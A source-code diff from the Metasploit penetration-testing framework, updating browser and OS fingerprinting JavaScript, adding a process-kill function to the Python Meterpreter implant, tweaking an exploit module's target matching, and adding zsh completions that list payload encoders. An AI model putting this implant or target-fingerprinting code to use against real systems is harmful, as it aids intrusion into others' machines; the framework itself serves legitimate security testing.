case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP
|
||||
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
|
||||
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
|
||||
case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP
|
||||
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP
|
||||
case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000
|
||||
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
|
||||
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
|
||||
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
|
||||
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
|
||||
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20120312181643":
|
||||
// It is disconcerting that a buildID is the same on Windows
|
||||
// and Mac, need to examine more versions on Mac.
|
||||
|
@ -699,9 +706,9 @@ os_detect.getVersion = function(){
|
|||
os_name = oses_windows; // browsershots: Firefox 11.0 / Windows XP
|
||||
}
|
||||
break;
|
||||
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
|
||||
case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Fedora"; break;
|
||||
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
|
||||
case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_vendor = "Fedora"; break;
|
||||
default:
|
||||
version = this.searchVersion("Firefox", navigator.userAgent);
|
||||
// Verify whether the ua string is lying by checking if it contains
|
||||
|
@ -731,64 +738,67 @@ os_detect.getVersion = function(){
|
|||
// share.
|
||||
os_name = oses_windows;
|
||||
ua_name = clients_ie;
|
||||
version = ScriptEngineMajorVersion().toString();
|
||||
version += ScriptEngineMinorVersion().toString();
|
||||
version += ScriptEngineBuildVersion().toString();
|
||||
version_maj = ScriptEngineMajorVersion().toString();
|
||||
version_min = ScriptEngineMinorVersion().toString();
|
||||
version_build = ScriptEngineBuildVersion().toString();
|
||||
|
||||
version = version_maj + version_min + version_build;
|
||||
|
||||
//document.write("ScriptEngine: "+version+"<br />");
|
||||
switch (version){
|
||||
case "514615":
|
||||
// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
|
||||
ua_version = "5.0";
|
||||
os_flavor = "2000";
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "515907":
|
||||
os_flavor = "2000";
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
|
||||
break;
|
||||
case "518513":
|
||||
os_flavor = "2000";
|
||||
os_name = "Windows 2000";
|
||||
os_sp = "SP4";
|
||||
break;
|
||||
case "566626":
|
||||
// IE 6.0.2600.0000, XP SP0 English
|
||||
// IE 6.0.2800.1106, XP SP1 English
|
||||
ua_version = "6.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "568515":
|
||||
// IE 6.0.3790.0, 2003 Standard SP0 English
|
||||
ua_version = "6.0";
|
||||
os_flavor = "2003";
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "568820":
|
||||
// IE 6.0.2900.2180, xp sp2 english
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "568827":
|
||||
os_flavor = "2003";
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "568831": //XP SP2 -OR- 2K SP4
|
||||
if (os_flavor == "2000"){
|
||||
if (os_name == "2000"){
|
||||
os_sp = "SP4";
|
||||
}
|
||||
else{
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
}
|
||||
break;
|
||||
case "568832":
|
||||
os_flavor = "2003";
|
||||
os_name = "Windows 2003";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "568837":
|
||||
// IE 6.0.2900.2180, XP Professional SP2 Korean
|
||||
ua_version = "6.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP2";
|
||||
break;
|
||||
case "5716599":
|
||||
|
@ -799,7 +809,7 @@ os_detect.getVersion = function(){
|
|||
// Since this scriptengine applies to more than one major version of
|
||||
// IE, rely on the object detection below to determine ua_version.
|
||||
//ua_version = "6.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "575730":
|
||||
|
@ -814,19 +824,19 @@ os_detect.getVersion = function(){
|
|||
case "5718066":
|
||||
// IE 7.0.5730.13, XP Professional SP3 English
|
||||
ua_version = "7.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "5722589":
|
||||
// IE 7.0.5730.13, XP Professional SP3 English
|
||||
ua_version = "7.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "576000":
|
||||
// IE 7.0.6000.16386, Vista Ultimate SP0 English
|
||||
ua_version = "7.0";
|
||||
os_flavor = "Vista";
|
||||
os_name = "Windows Vista";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "580":
|
||||
|
@ -838,13 +848,13 @@ os_detect.getVersion = function(){
|
|||
case "5816762":
|
||||
// IE 8.0.7600.16385, Windows 7 English
|
||||
ua_version = "8.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "5817514":
|
||||
// IE 8.0.7600.17514, Windows 7 SP1 English
|
||||
ua_version = "8.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "5818702":
|
||||
|
@ -852,104 +862,109 @@ os_detect.getVersion = function(){
|
|||
case "5822960":
|
||||
// IE 8.0.6001.18702, XP Professional SP3 Greek
|
||||
ua_version = "8.0";
|
||||
os_flavor = "XP";
|
||||
os_name = "Windows XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "9016406":
|
||||
// IE 9.0.7930.16406, Windows 7 64-bit
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "9016441":
|
||||
// IE 9.0.8112.16421, Windows 7 32-bit English
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016443":
|
||||
// IE 9.0.8112.16421, Windows 7 Polish
|
||||
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016446":
|
||||
// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
|
||||
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016464":
|
||||
// browsershots.org, MSIE 7.0 / Windows 2008 R2
|
||||
os_flavor = "2008R2";
|
||||
os_name = "Windows 2008 R2";
|
||||
ua_version = "9.0";
|
||||
break;
|
||||
case "9016470":
|
||||
// IE 9.0.8112.16421 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016502":
|
||||
// IE 9.0.8112.16502 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016506":
|
||||
// IE 9.0.8112.16506 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016514":
|
||||
// IE 9.0.8112.16514 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016520":
|
||||
// IE 9.0.8112.16520 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016526":
|
||||
// IE 9.0.8112.16526 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "9016533":
|
||||
// IE 9.0.8112.16533 / Windows 7 SP1
|
||||
ua_version = "9.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "10016720":
|
||||
// IE 10.0.9200.16721 / Windows 7 SP1
|
||||
ua_version = "10.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "11016428":
|
||||
// IE 11.0.9600.16428 / Windows 7 SP1
|
||||
ua_version = "11.0";
|
||||
os_flavor = "7";
|
||||
os_name = "Windows 7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "10016384":
|
||||
// IE 10.0.9200.16384 / Windows 8 x86
|
||||
ua_version = "10.0";
|
||||
os_flavor = "8";
|
||||
os_name = "Windows 8";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
case "11016426":
|
||||
// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
|
||||
ua_version = "11.0";
|
||||
os_name = "Windows 8.1";
|
||||
break;
|
||||
case "1000":
|
||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||
ua_version = "10.0";
|
||||
os_flavor = "8";
|
||||
os_name = "Windows 8";
|
||||
os_sp = "SP0";
|
||||
break;
|
||||
default:
|
||||
|
@ -1015,7 +1030,7 @@ os_detect.getVersion = function(){
|
|||
if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
|
||||
|
||||
//--
|
||||
// Flavor
|
||||
// Figure out the type of Windows
|
||||
//--
|
||||
if (!ua_is_lying) {
|
||||
version = useragent.toLowerCase();
|
||||
|
@ -1032,27 +1047,28 @@ os_detect.getVersion = function(){
|
|||
else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; }
|
||||
else if (version.indexOf("linux") != -1) { os_name = oses_linux; }
|
||||
}
|
||||
if (os_name == oses_windows && (!os_flavor || 0 == os_flavor.length)) {
|
||||
if (version.indexOf("windows 95") != -1) { os_flavor = "95"; }
|
||||
else if (version.indexOf("windows nt 4") != -1) { os_flavor = "NT"; }
|
||||
else if (version.indexOf("win 9x 4.9") != -1) { os_flavor = "ME"; }
|
||||
else if (version.indexOf("windows 98") != -1) { os_flavor = "98"; }
|
||||
else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000"; }
|
||||
else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP"; }
|
||||
else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; }
|
||||
else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
|
||||
else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; }
|
||||
else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; }
|
||||
if (os_name == oses_windows) {
|
||||
if (version.indexOf("windows 95") != -1) { os_name = "Windows 95"; }
|
||||
else if (version.indexOf("windows nt 4") != -1) { os_name = "Windows NT"; }
|
||||
else if (version.indexOf("win 9x 4.9") != -1) { os_name = "Windows ME"; }
|
||||
else if (version.indexOf("windows 98") != -1) { os_name = "Windows 98"; }
|
||||
else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000"; }
|
||||
else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP"; }
|
||||
else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003"; }
|
||||
else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
|
||||
else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7"; }
|
||||
else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8"; }
|
||||
else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1"; }
|
||||
}
|
||||
if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) {
|
||||
if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; }
|
||||
else if (version.indexOf("ubuntu") != -1) { os_flavor = "Ubuntu"; }
|
||||
else if (version.indexOf("debian") != -1) { os_flavor = "Debian"; }
|
||||
else if (version.indexOf("rhel") != -1) { os_flavor = "RHEL"; }
|
||||
else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL"; }
|
||||
else if (version.indexOf("centos") != -1) { os_flavor = "CentOS"; }
|
||||
else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; }
|
||||
else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
|
||||
if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
|
||||
if (version.indexOf("gentoo") != -1) { os_vendor = "Gentoo"; }
|
||||
else if (version.indexOf("ubuntu") != -1) { os_vendor = "Ubuntu"; }
|
||||
else if (version.indexOf("debian") != -1) { os_vendor = "Debian"; }
|
||||
else if (version.indexOf("rhel") != -1) { os_vendor = "RHEL"; }
|
||||
else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL"; }
|
||||
else if (version.indexOf("centos") != -1) { os_vendor = "CentOS"; }
|
||||
else if (version.indexOf("fedora") != -1) { os_vendor = "Fedora"; }
|
||||
else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
|
||||
}
|
||||
|
||||
//--
|
||||
|
@ -1110,7 +1126,9 @@ os_detect.getVersion = function(){
|
|||
|
||||
this.ua_is_lying = ua_is_lying;
|
||||
this.os_name = os_name;
|
||||
this.os_vendor = os_vendor;
|
||||
this.os_flavor = os_flavor;
|
||||
this.os_device = os_device;
|
||||
this.os_sp = os_sp;
|
||||
this.os_lang = os_lang;
|
||||
this.arch = arch;
|
||||
|
@ -1118,7 +1136,7 @@ os_detect.getVersion = function(){
|
|||
this.ua_version = ua_version;
|
||||
this.ua_version = ua_version;
|
||||
|
||||
return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
|
||||
return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
|
||||
}; // function getVersion
|
||||
|
||||
os_detect.searchVersion = function(needle, haystack) {
|
||||
|
|
|
@ -472,10 +472,14 @@ ERROR_FAILURE = 1
|
|||
ERROR_CONNECTION_ERROR = 10000
|
||||
|
||||
# Windows Constants
|
||||
GAA_FLAG_SKIP_ANYCAST = 0x0002
|
||||
GAA_FLAG_SKIP_MULTICAST = 0x0004
|
||||
GAA_FLAG_INCLUDE_PREFIX = 0x0010
|
||||
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
|
||||
GAA_FLAG_SKIP_ANYCAST = 0x0002
|
||||
GAA_FLAG_SKIP_MULTICAST = 0x0004
|
||||
GAA_FLAG_INCLUDE_PREFIX = 0x0010
|
||||
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
|
||||
PROCESS_TERMINATE = 0x0001
|
||||
PROCESS_VM_READ = 0x0010
|
||||
PROCESS_QUERY_INFORMATION = 0x0400
|
||||
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
|
||||
|
||||
WIN_AF_INET = 2
|
||||
WIN_AF_INET6 = 23
|
||||
|
@ -666,12 +670,11 @@ def stdapi_sys_config_sysinfo(request, response):
|
|||
|
||||
@meterpreter.register_function
|
||||
def stdapi_sys_process_close(request, response):
|
||||
proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
|
||||
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)
|
||||
if not proc_h_id:
|
||||
return ERROR_SUCCESS, response
|
||||
proc_h_id = proc_h_id['value']
|
||||
proc_h = meterpreter.channels[proc_h_id]
|
||||
proc_h.kill()
|
||||
del meterpreter.processes[proc_h_id]
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
|
@ -720,6 +723,23 @@ def stdapi_sys_process_getpid(request, response):
|
|||
response += tlv_pack(TLV_TYPE_PID, os.getpid())
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_sys_process_kill(request, response):
|
||||
for pid in packet_enum_tlvs(request, TLV_TYPE_PID):
|
||||
pid = pid['value']
|
||||
if has_windll:
|
||||
k32 = ctypes.windll.kernel32
|
||||
proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
|
||||
if not proc_h:
|
||||
return ERROR_FAILURE, response
|
||||
if not k32.TerminateProcess(proc_h, 0):
|
||||
return ERROR_FAILURE, response
|
||||
elif hasattr(os, 'kill'):
|
||||
os.kill(pid, 9)
|
||||
else:
|
||||
return ERROR_FAILURE, response
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
def stdapi_sys_process_get_processes_via_proc(request, response):
|
||||
for pid in os.listdir('/proc'):
|
||||
pgroup = bytes()
|
||||
|
@ -772,9 +792,6 @@ def stdapi_sys_process_get_processes_via_ps(request, response):
|
|||
|
||||
def stdapi_sys_process_get_processes_via_windll(request, response):
|
||||
TH32CS_SNAPPROCESS = 2
|
||||
PROCESS_QUERY_INFORMATION = 0x0400
|
||||
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
|
||||
PROCESS_VM_READ = 0x10
|
||||
TOKEN_QUERY = 0x0008
|
||||
TokenUser = 1
|
||||
k32 = ctypes.windll.kernel32
|
||||
|
|
|
@ -332,7 +332,6 @@ class PythonMeterpreter(object):
|
|||
response = self.create_response(request)
|
||||
self.socket.send(response)
|
||||
else:
|
||||
channels_for_removal = []
|
||||
# iterate over the keys because self.channels could be modified if one is closed
|
||||
channel_ids = list(self.channels.keys())
|
||||
for channel_id in channel_ids:
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
:ua_minver => "8.0",
|
||||
:ua_maxver => "10.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:rank => NormalRanking
|
||||
})
|
||||
|
||||
|
@ -85,6 +85,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
os_name = 'Windows 7'
|
||||
when '6.2'
|
||||
os_name = 'Windows 8'
|
||||
when '6.3'
|
||||
os_name = 'Windows 8.1'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
Metasploit completion definitions for zsh. The directory containing the
|
||||
completion files needs to be added to the ```$fpath``` environment variable,
|
||||
this is usually done in the ```~/.zshrc``` file.
|
|
@ -0,0 +1,39 @@
|
|||
#compdef msfconsole
|
||||
# ------------------------------------------------------------------------------
|
||||
# License
|
||||
# -------
|
||||
# This file is part of the Metasploit Framework and is released under the MSF
|
||||
# License, please see the COPYING file for more details.
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Description
|
||||
# -----------
|
||||
#
|
||||
# Completion script for the Metasploit Framework's msfconsole command
|
||||
# (http://www.metasploit.com/).
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Authors
|
||||
# -------
|
||||
#
|
||||
# * Spencer McIntyre
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
|
||||
_arguments \
|
||||
{-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
|
||||
"-c[Load the specified configuration file]:configuration file:_files" \
|
||||
{-d,--defanged}"[Execute the console as defanged]" \
|
||||
{-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
|
||||
{-h,--help}"[Show help text]" \
|
||||
{-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
|
||||
{-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
|
||||
{-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
|
||||
{-n,--no-database}"[Disable database support]" \
|
||||
{-o,--output}"[Output to the specified file]:output file" \
|
||||
{-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
|
||||
{-q,--quiet}"[Do not print the banner on start up]" \
|
||||
{-r,--resource}"[Execute the specified resource file]:resource file:_files" \
|
||||
{-v,--version}"[Show version]" \
|
||||
{-x,--execute-command}"[Execute the specified string as console commands]:commands" \
|
||||
{-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"
|
|
@ -0,0 +1,82 @@
|
|||
#compdef msfencode
|
||||
# ------------------------------------------------------------------------------
|
||||
# License
|
||||
# -------
|
||||
# This file is part of the Metasploit Framework and is released under the MSF
|
||||
# License, please see the COPYING file for more details.
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Description
|
||||
# -----------
|
||||
#
|
||||
# Completion script for the Metasploit Framework's msfencode command
|
||||
# (http://www.metasploit.com/).
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Authors
|
||||
# -------
|
||||
#
|
||||
# * Spencer McIntyre
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
|
||||
_msfencode_encoders_list=(
|
||||
'cmd/generic_sh'
|
||||
'cmd/ifs'
|
||||
'cmd/powershell_base64'
|
||||
'cmd/printf_php_mq'
|
||||
'generic/eicar'
|
||||
'generic/none'
|
||||
'mipsbe/byte_xori'
|
||||
'mipsbe/longxor'
|
||||
'mipsle/byte_xori'
|
||||
'mipsle/longxor'
|
||||
'php/base64'
|
||||
'ppc/longxor'
|
||||
'ppc/longxor_tag'
|
||||
'sparc/longxor_tag'
|
||||
'x64/xor'
|
||||
'x86/add_sub'
|
||||
'x86/alpha_mixed'
|
||||
'x86/alpha_upper'
|
||||
'x86/avoid_underscore_tolower'
|
||||
'x86/avoid_utf8_tolower'
|
||||
'x86/bloxor'
|
||||
'x86/call4_dword_xor'
|
||||
'x86/context_cpuid'
|
||||
'x86/context_stat'
|
||||
'x86/context_time'
|
||||
'x86/countdown'
|
||||
'x86/fnstenv_mov'
|
||||
'x86/jmp_call_additive'
|
||||
'x86/nonalpha'
|
||||
'x86/nonupper'
|
||||
'x86/opt_sub'
|
||||
'x86/shikata_ga_nai'
|
||||
'x86/single_static_bit'
|
||||
'x86/unicode_mixed'
|
||||
'x86/unicode_upper'
|
||||
)
|
||||
|
||||
_msfencode_encoder() {
|
||||
_describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
|
||||
}
|
||||
|
||||
_arguments \
|
||||
"-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
|
||||
"-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
|
||||
"-c[The number of times to encode the data]:times" \
|
||||
"-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
|
||||
"-e[The encoder to use]:encoder:_msfencode_encoder" \
|
||||
"-h[Help banner]" \
|
||||
"-i[Encode the contents of the supplied file path]:input file:_files" \
|
||||
"-k[Keep template working; run payload in new thread (use with -x)]" \
|
||||
"-l[List available encoders]" \
|
||||
"-m[Specifies an additional module search path]:module path:_files -/" \
|
||||
"-n[Dump encoder information]" \
|
||||
"-o[The output file]:output file" \
|
||||
"-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
|
||||
"-s[The maximum size of the encoded data]:maximum size" \
|
||||
"-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
|
||||
"-v[Increase verbosity]" \
|
||||
"-x[Specify an alternate executable template]:template file:_files"
|
|
@ -0,0 +1,81 @@
|
|||
#compdef msfvenom
|
||||
# ------------------------------------------------------------------------------
|
||||
# License
|
||||
# -------
|
||||
# This file is part of the Metasploit Framework and is released under the MSF
|
||||
# License, please see the COPYING file for more details.
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Description
|
||||
# -----------
|
||||
#
|
||||
# Completion script for the Metasploit Framework's msfvenom command
|
||||
# (http://www.metasploit.com/).
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
# Authors
|
||||
# -------
|
||||
#
|
||||
# * Spencer McIntyre
|
||||
#
|
||||
# ------------------------------------------------------------------------------
|
||||
|
||||
_msfvenom_encoders_list=(
|
||||
'cmd/generic_sh'
|
||||
'cmd/ifs'
|
||||
'cmd/powershell_base64'
|
||||
'cmd/printf_php_mq'
|
||||
'generic/eicar'
|
||||
'generic/none'
|
||||
'mipsbe/byte_xori'
|
||||
'mipsbe/longxor'
|
||||
'mipsle/byte_xori'
|
||||
'mipsle/longxor'
|
||||
'php/base64'
|
||||
'ppc/longxor'
|
||||
'ppc/longxor_tag'
|
||||
'sparc/longxor_tag'
|
||||
'x64/xor'
|
||||
'x86/add_sub'
|
||||
'x86/alpha_mixed'
|
||||
'x86/alpha_upper'
|
||||
'x86/avoid_underscore_tolower'
|
||||
'x86/avoid_utf8_tolower'
|
||||
'x86/bloxor'
|
||||
'x86/call4_dword_xor'
|
||||
'x86/context_cpuid'
|
||||
'x86/context_stat'
|
||||
'x86/context_time'
|
||||
'x86/countdown'
|
||||
'x86/fnstenv_mov'
|
||||
'x86/jmp_call_additive'
|
||||
'x86/nonalpha'
|
||||
'x86/nonupper'
|
||||
'x86/opt_sub'
|
||||
'x86/shikata_ga_nai'
|
||||
'x86/single_static_bit'
|
||||
'x86/unicode_mixed'
|
||||
'x86/unicode_upper'
|
||||
)
|
||||
|
||||
_msfvenom_encoder() {
|
||||
_describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
|
||||
}
|
||||
|
||||
_arguments \
|
||||
{-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
|
||||
{-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
|
||||
